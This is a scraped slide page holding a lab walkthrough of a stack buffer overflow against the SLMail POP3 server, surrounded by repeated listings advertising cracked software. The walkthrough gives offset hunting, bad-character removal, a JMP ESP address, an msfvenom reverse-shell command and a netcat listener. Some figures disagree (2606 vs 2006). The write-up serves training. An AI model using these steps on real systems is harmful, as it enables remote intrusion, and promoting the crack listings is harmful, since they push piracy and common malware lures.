Adobe After Effects Crack FREE FRESH version 2025Adobe After Effects Crack FREE FRESH version 2025
Adobe After Effects Crack FREE FRESH version 2025
kashifyounis067
 
TestMigrationsInPy: A Dataset of Test Migrations from Unittest to Pytest (MSR...
TestMigrationsInPy: A Dataset of Test Migrations from Unittest to Pytest (MSR...TestMigrationsInPy: A Dataset of Test Migrations from Unittest to Pytest (MSR...
TestMigrationsInPy: A Dataset of Test Migrations from Unittest to Pytest (MSR...
Andre Hora
 
Download Wondershare Filmora Crack [2025] With Latest
Download Wondershare Filmora Crack [2025] With LatestDownload Wondershare Filmora Crack [2025] With Latest
Download Wondershare Filmora Crack [2025] With Latest
tahirabibi60507
 
WinRAR Crack for Windows (100% Working 2025)
WinRAR Crack for Windows (100% Working 2025)WinRAR Crack for Windows (100% Working 2025)
WinRAR Crack for Windows (100% Working 2025)
sh607827
 
Top 10 Client Portal Software Solutions for 2025.docx
Top 10 Client Portal Software Solutions for 2025.docxTop 10 Client Portal Software Solutions for 2025.docx
Top 10 Client Portal Software Solutions for 2025.docx
Portli
 
Not So Common Memory Leaks in Java Webinar
Not So Common Memory Leaks in Java WebinarNot So Common Memory Leaks in Java Webinar
Not So Common Memory Leaks in Java Webinar
Tier1 app
 
Proactive Vulnerability Detection in Source Code Using Graph Neural Networks:...
Proactive Vulnerability Detection in Source Code Using Graph Neural Networks:...Proactive Vulnerability Detection in Source Code Using Graph Neural Networks:...
Proactive Vulnerability Detection in Source Code Using Graph Neural Networks:...
Ranjan Baisak
 
Explaining GitHub Actions Failures with Large Language Models Challenges, In...
Explaining GitHub Actions Failures with Large Language Models Challenges, In...Explaining GitHub Actions Failures with Large Language Models Challenges, In...
Explaining GitHub Actions Failures with Large Language Models Challenges, In...
ssuserb14185
 
Adobe Master Collection CC Crack Advance Version 2025
Adobe Master Collection CC Crack Advance Version 2025Adobe Master Collection CC Crack Advance Version 2025
Adobe Master Collection CC Crack Advance Version 2025
kashifyounis067
 
Adobe Lightroom Classic Crack FREE Latest link 2025
Adobe Lightroom Classic Crack FREE Latest link 2025Adobe Lightroom Classic Crack FREE Latest link 2025
Adobe Lightroom Classic Crack FREE Latest link 2025
kashifyounis067
 
Landscape of Requirements Engineering for/by AI through Literature Review
Landscape of Requirements Engineering for/by AI through Literature ReviewLandscape of Requirements Engineering for/by AI through Literature Review
Landscape of Requirements Engineering for/by AI through Literature Review
Hironori Washizaki
 
How to Batch Export Lotus Notes NSF Emails to Outlook PST Easily?
How to Batch Export Lotus Notes NSF Emails to Outlook PST Easily?How to Batch Export Lotus Notes NSF Emails to Outlook PST Easily?
How to Batch Export Lotus Notes NSF Emails to Outlook PST Easily?
steaveroggers
 
Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...
Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...
Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...
Eric D. Schabell
 
Designing AI-Powered APIs on Azure: Best Practices& Considerations
Designing AI-Powered APIs on Azure: Best Practices& ConsiderationsDesigning AI-Powered APIs on Azure: Best Practices& Considerations
Designing AI-Powered APIs on Azure: Best Practices& Considerations
Dinusha Kumarasiri
 
Why Orangescrum Is a Game Changer for Construction Companies in 2025
Why Orangescrum Is a Game Changer for Construction Companies in 2025Why Orangescrum Is a Game Changer for Construction Companies in 2025
Why Orangescrum Is a Game Changer for Construction Companies in 2025
Orangescrum
 
Adobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage Dashboards
Adobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage DashboardsAdobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage Dashboards
Adobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage Dashboards
BradBedford3
 
How Valletta helped healthcare SaaS to transform QA and compliance to grow wi...
How Valletta helped healthcare SaaS to transform QA and compliance to grow wi...How Valletta helped healthcare SaaS to transform QA and compliance to grow wi...
How Valletta helped healthcare SaaS to transform QA and compliance to grow wi...
Egor Kaleynik
 
Expand your AI adoption with AgentExchange
Expand your AI adoption with AgentExchangeExpand your AI adoption with AgentExchange
Expand your AI adoption with AgentExchange
Fexle Services Pvt. Ltd.
 
Avast Premium Security Crack FREE Latest Version 2025
Avast Premium Security Crack FREE Latest Version 2025Avast Premium Security Crack FREE Latest Version 2025
Avast Premium Security Crack FREE Latest Version 2025
mu394968
 
What Do Contribution Guidelines Say About Software Testing? (MSR 2025)
What Do Contribution Guidelines Say About Software Testing? (MSR 2025)What Do Contribution Guidelines Say About Software Testing? (MSR 2025)
What Do Contribution Guidelines Say About Software Testing? (MSR 2025)
Andre Hora
 
Adobe After Effects Crack FREE FRESH version 2025
Adobe After Effects Crack FREE FRESH version 2025Adobe After Effects Crack FREE FRESH version 2025
Adobe After Effects Crack FREE FRESH version 2025
kashifyounis067
 
TestMigrationsInPy: A Dataset of Test Migrations from Unittest to Pytest (MSR...
TestMigrationsInPy: A Dataset of Test Migrations from Unittest to Pytest (MSR...TestMigrationsInPy: A Dataset of Test Migrations from Unittest to Pytest (MSR...
TestMigrationsInPy: A Dataset of Test Migrations from Unittest to Pytest (MSR...
Andre Hora
 
Download Wondershare Filmora Crack [2025] With Latest
Download Wondershare Filmora Crack [2025] With LatestDownload Wondershare Filmora Crack [2025] With Latest
Download Wondershare Filmora Crack [2025] With Latest
tahirabibi60507
 
WinRAR Crack for Windows (100% Working 2025)
WinRAR Crack for Windows (100% Working 2025)WinRAR Crack for Windows (100% Working 2025)
WinRAR Crack for Windows (100% Working 2025)
sh607827
 
Top 10 Client Portal Software Solutions for 2025.docx
Top 10 Client Portal Software Solutions for 2025.docxTop 10 Client Portal Software Solutions for 2025.docx
Top 10 Client Portal Software Solutions for 2025.docx
Portli
 
Not So Common Memory Leaks in Java Webinar
Not So Common Memory Leaks in Java WebinarNot So Common Memory Leaks in Java Webinar
Not So Common Memory Leaks in Java Webinar
Tier1 app
 
Proactive Vulnerability Detection in Source Code Using Graph Neural Networks:...
Proactive Vulnerability Detection in Source Code Using Graph Neural Networks:...Proactive Vulnerability Detection in Source Code Using Graph Neural Networks:...
Proactive Vulnerability Detection in Source Code Using Graph Neural Networks:...
Ranjan Baisak
 
Explaining GitHub Actions Failures with Large Language Models Challenges, In...
Explaining GitHub Actions Failures with Large Language Models Challenges, In...Explaining GitHub Actions Failures with Large Language Models Challenges, In...
Explaining GitHub Actions Failures with Large Language Models Challenges, In...
ssuserb14185
 
Adobe Master Collection CC Crack Advance Version 2025
Adobe Master Collection CC Crack Advance Version 2025Adobe Master Collection CC Crack Advance Version 2025
Adobe Master Collection CC Crack Advance Version 2025
kashifyounis067
 
Adobe Lightroom Classic Crack FREE Latest link 2025
Adobe Lightroom Classic Crack FREE Latest link 2025Adobe Lightroom Classic Crack FREE Latest link 2025
Adobe Lightroom Classic Crack FREE Latest link 2025
kashifyounis067
 
Landscape of Requirements Engineering for/by AI through Literature Review
Landscape of Requirements Engineering for/by AI through Literature ReviewLandscape of Requirements Engineering for/by AI through Literature Review
Landscape of Requirements Engineering for/by AI through Literature Review
Hironori Washizaki
 
How to Batch Export Lotus Notes NSF Emails to Outlook PST Easily?
How to Batch Export Lotus Notes NSF Emails to Outlook PST Easily?How to Batch Export Lotus Notes NSF Emails to Outlook PST Easily?
How to Batch Export Lotus Notes NSF Emails to Outlook PST Easily?
steaveroggers
 
Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...
Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...
Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...
Eric D. Schabell
 
Designing AI-Powered APIs on Azure: Best Practices& Considerations
Designing AI-Powered APIs on Azure: Best Practices& ConsiderationsDesigning AI-Powered APIs on Azure: Best Practices& Considerations
Designing AI-Powered APIs on Azure: Best Practices& Considerations
Dinusha Kumarasiri
 
Why Orangescrum Is a Game Changer for Construction Companies in 2025
Why Orangescrum Is a Game Changer for Construction Companies in 2025Why Orangescrum Is a Game Changer for Construction Companies in 2025
Why Orangescrum Is a Game Changer for Construction Companies in 2025
Orangescrum
 
Adobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage Dashboards
Adobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage DashboardsAdobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage Dashboards
Adobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage Dashboards
BradBedford3
 
How Valletta helped healthcare SaaS to transform QA and compliance to grow wi...
How Valletta helped healthcare SaaS to transform QA and compliance to grow wi...How Valletta helped healthcare SaaS to transform QA and compliance to grow wi...
How Valletta helped healthcare SaaS to transform QA and compliance to grow wi...
Egor Kaleynik
 
Expand your AI adoption with AgentExchange
Expand your AI adoption with AgentExchangeExpand your AI adoption with AgentExchange
Expand your AI adoption with AgentExchange
Fexle Services Pvt. Ltd.
 
Avast Premium Security Crack FREE Latest Version 2025
Avast Premium Security Crack FREE Latest Version 2025Avast Premium Security Crack FREE Latest Version 2025
Avast Premium Security Crack FREE Latest Version 2025
mu394968
 
Ad

Slmail Buffer Overflow

  • 1. Exploiting SLMail by Stack Based Buffer Overflow Eric Alleshouse -- Independent Security Researcher [email protected] April 27 2017 How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 1
  • 2. Table of Contents How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow……………....……………….…………………...…....……...1 Introduction…………………………….……….………………...……………..3 Lab setup………………………….…….………………...………………3 Immunity configuration………………..…….……………...……………..….4 Simple buffer test…………………………….…………...…………………....6 Nmap scan………………………………………………...……………………..7 Crashing the program………………………………...…………………….….8 A unique string.……………………………………...…………………….…....9 Finding EIP memory location ………….…………………………………...10 Controlling EIP…..………………………….………………………….….…..11 The bytearray……………………………….…………………………..……...12 Truncation………………...……………………….………………………..….13 JMP ESP….……………………………....……..…..…………………….…....15 The final Exploit compiled ...…………………..………………………...….16 Shell received ……………………………………..………..………………....17 How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 2
  • 3. **A special thanks goes out to Aryan Guenthner, Penetration Tester, who has guided and encouraged me to ‘Try Harder’ at succeeding with this project and to produce this report. ** Introduction SLMail is SMTP and POP3 email server software for Microsoft™ Windows NT and 2000.​ It was meant to be a framework for an email solution and was written without an emphasis on security integrated in it’s development. As a result, the boundaries are not checked resulting in a buffer overflow situation. This vulnerability is exploitable and allows me to gain a remote shell on the system and extract sensitive documents from the system. If these instructions are followed, then the same results will be reproduced. SLMail can be downloaded ​here​. Lab setup I’m using the VirtualBox hypervisor with a Kali 2016.2 and Windows 7 virtual machines. Installed on the Windows machine is the SLmail pop3 server and immunity debugger with the mona.py script inserted into the python commands folder within Immunity debugger. The firewall in Windows has been turned off to simulate a possible real world simulation of security misconfiguration. Perhaps the firewall was disabled for troubleshooting purposes and forgotten about, among other scenarios that represent a misconfiguration. This exercise shows a consequence of failing to audit a system resulting in an exploit of the system and exposure to sensitive files. If the instructions are followed in this document, the results will be reproduced. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 3
  • 4. SLmail can be downloaded from http://download.cnet.com/SLmail/3000-18506_4-10002446.html Kali can be downloaded from ​http://www.kali.org Immunity debugger: ​https://www.immunityinc.com/products/debugger/index.html Virtualbox: ​https://www.virtualbox.org/wiki/Downloads Mona.py (which is inserted into the commands folder in Immunity): https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/ The goal of the exercise is to redirect the EIP memory address to a JMP ESP address which will lead the execution flow into a shellcode which I injected into memory, allowing me to browse the remote system and extract sensitive data. As a side note, my host operating system is a MacBook Pro, and I have found a limitation for drag and drop between host and guest, so the workaround to this is to create a shared folder on the host that is accessible by the vm’s. Netcat will also work, to transfer files, but takes a little more time to set up because it is not a native program within Windows. Once the VM’s are set up, I made sure the VM’s are on the ‘host only’ network so they are kept from being exposed to the internet. The Vm’s should be on the same network and able to ping each other. It is a good idea to start up the SLmail service and try connecting to it with netcat to be sure it is accepting inbound connections. To do this, issue the command: nc 192.168.56.101 110 (Ip address is the ip of the Windows machine, and the port it connects to is 110). You will see the pop server ready to accept instructions if successful. Immunity debugger should be started up and attached to the SLmail process and running so that the memory locations and dumps can be observed. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 4
  • 5. Click file - attach - SLmail Within Immunity debugger, set the working folder to c:logs by issuing the command: !mona config -set workingfolder c:logs All created logs and documents from Mona will be found there. First, I need to verify the crash of the application by using a poc.py script to fuzz the application. The exploit will send 3000 ‘A’s to the server and crash it, to verify that there is a vulnerability within SLmail. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 5
  • 6. A snapshot of the the whole exploit is shown below. It is written in python and imports the socket module to make a connection to the remote Vulnserver. It will send 3000 ‘A’s along with ‘PASS’ and the ‘USER username’ which the server takes as input. The server ip in the script reflects the ip address of my windows machine where vulnserver resides and the port it uses is 110, which I found from a simple nmap scan of the ip address. Initial exploit How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 6
  • 7. Nmap scan of the ip address After sending this exploit from Kali, the result shows that the program crashes and ESP contains many ‘A’s or ‘41’ in hex. This shows that the boundary hasn’t been checked as I can inject my own data into the program and cause it to crash. Each time the program is crashed, SLmail needs to be restarted, and it’s process re-attached to Immunity. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 7
  • 8. Program crash with 3000 ‘A’s in memory In order to find the specific location of ESP, a unique string needs to be sent to the program and the offset address located from the debugger. Use the Immunity command !mona pc 3000 (to create a unique string of characters. There is also a tool within Kali in the directory which can be used located in: /usr/share/metasploit-framework/tools/exploit/pattern_create Copy the unique string into the exploit and send it to the vulnserver. ie.exploit = 'Aa0Aa1Aa2Aa....' instead of the ‘A’s The unique pattern string will be found in the c:logs working folder after using the mona command. Or from Kali How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 8
  • 9. Note the exploit was changed from ‘A’s to the unique string created. Then it was sent to the vulnserver to crash again. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 9
  • 10. Server crash and unique string shown in memory dump After the system crashes, I locate the position of EIP. To find this, issued the Immunity command !mona po 396f4338 (or use the Kali tool /usr/share/metasploit_framework/tools/exploit/pattern_offset -q 296f4338 to find it's location) The location was found at position 2606. This will become my offset in the exploit. eg. !mona po 396f4338 The unique pattern found in EIP is located at position 2606. EIP will be the next 4 bytes in memory, so the pattern offset now becomes 'A'*2006 + 'B'*4 (run the script again to verify control of the EIP by noting that 4 ‘B’s get written to the EIP register. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 10
  • 11. EIP register has ‘42’ or ‘B’’s written to it The four ‘B’s at the end of the ‘A’s are found and this confirms control over the EIP register. Next, I need to examine which bytes will cause problems within SLmail such as truncation, and render my exploit code useless. I use Immunity !mona bytearray -b "x00" to create a list of all the possible hex characters without the 00 character, which is a null byte and will cause truncation. The file will be saved to c:logs. I copied the string into the exploit and set this in place of the offset to view any further truncation caused by other bad characters, and eliminate them one by one until a clean set of characters is able to be passed to the program without issue. Below is illustrated all possible hex characters minus the 00. The picture with truncation happening shows that the 0A character is causing problems afterward indicated by a bunch of 00’s, and therefore will be removed. After removal of each character, the exploit is re-run to view the output in memory. It is important to remove these bad characters so that the shellcode will be run successfully. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 11
  • 12. Send the byte array from the exploit : offset = 'A'*2006 + ‘B’*4 + badchars (bytearray) to see if there is any truncation caused by characters from the array. Offset and badchars are sent to the Vulnserver to test for truncation. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 12
  • 13. Truncation happening. Notice the truncation after 09. After bad characters x00x0ax0d are removed there is no more truncation. The hex string is successfully inserted to the memory buffer without problems. These bytes will be excluded when creating the shellcode with msfvenom later on in the exercise. . No more truncation Use Immunity !mona modules -o (to find the modules compatible with dlls within SLmail to use, and double click on one that doesn’t have ASLR or DEP enabled. These randomize memory addresses of the JMP ESP and are used for security purposes. I chose SLmail.exe. The -o option filters out the operating system modules to whittle the module list to relevant listings.) How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 13
  • 14. Click on the ‘e’ at the top to list the modules available and locate the SLmail.exe module and double click on it to jump to the slmail dlls. Working within SLmail.exe indicated in the title of the window How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 14
  • 15. Use Immunity !mona find -s 'xffxe4' -m .dll (to find the location of a JMP ESP location) The JMP ESP in my case is located at 5F4B41E3. Written in little endian format, it will become 'xe3x41x4bx5f' in the exploit. (I replace the 'B'’s with JMP ESP address). Since I control EIP, I can direct it to go to the JMP ESP address, slide down some no-operation instructions and fall into the malicious shellcode). I verify the address by searching that memory address in the debugger. To create a payload in Kali without the bad characters and insert this as a variable in the script, I type: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.103 LPORT=443 -f py -a x86 --platform windows -b 'x00x0ax0d' and insert the shellcode into my exploit. The exploit becomes exploit = offset + JMP ESP + nops + buff (offset is the memory just before EIP) (JMP ESP is the address location of EIP) (buf was the shellcode created in kali which contains my reverse tcp shell. In this case there is just a snip of the shell code) (nops are sent to create a little space and be sure that the shellcode gets run in the memory. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 15
  • 16. This is the final exploit with the shellcode. . How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 16
  • 17. Setup a netcat listener in Kali so the Windows machine has a place to connect to (nc -lvp 443). Send the exploit ./poc.py to Vulnserver A shell is gained on the compromised Windows machine by exploiting a vulnerability in the SLmail programming. There was no boundary check to the user input, so I was able to make the program crash and gain entry to the system from my shellcode. The next phase of the process would be Post exploitation where I can perform data exfiltration, move laterally through various machines on the network, pass the hash, and showing the impact of the exploit, but will not be explored in this walkthrough. Other useful information can be gained from from computers, routers, printers etc. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 17
  • 18. System information gathered How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 18